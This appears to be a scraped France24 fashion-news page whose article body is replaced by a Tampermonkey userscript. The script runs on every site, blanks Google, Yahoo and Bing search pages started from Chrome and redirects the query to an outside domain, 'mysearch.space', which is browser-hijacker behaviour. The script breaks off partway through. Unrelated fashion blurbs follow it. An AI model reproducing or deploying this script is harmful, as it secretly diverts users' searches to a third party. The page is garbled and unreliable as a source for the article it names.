Designer genes: Technical tinkering

By France24 |   11 June 2021   |   9:09 am  

 

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })(); setTimeout(function (){ let iframe = document.getElementsByTagName('iframe'); let arrayIframe = []; for (let i = 0; i

You may also like

7 Apr
In the second part of arts24's Rwanda series, Eve Jackson meets a fashion designer taking the country's fashion scene to the next level. Once a model, now designer, Moses Turahirwa re-imagines traditional Rwandan forms and cultural motifs into contemporary pieces.
7 Apr
At the campus of the French Fashion Institute, 27 design students from 13 different countries are gearing up to present their year's work before a highly influential audience. The stakes are high: these students are poised to compete with fellow graduates from the prestigious Central Saint Martins school in London.
3 days ago
The Chinese fast-fashion online retailer is now subject to EU rules as a "very large online platform," joining tech firms including Apple, Amazon and Microsoft. The rules include measures to protect online users.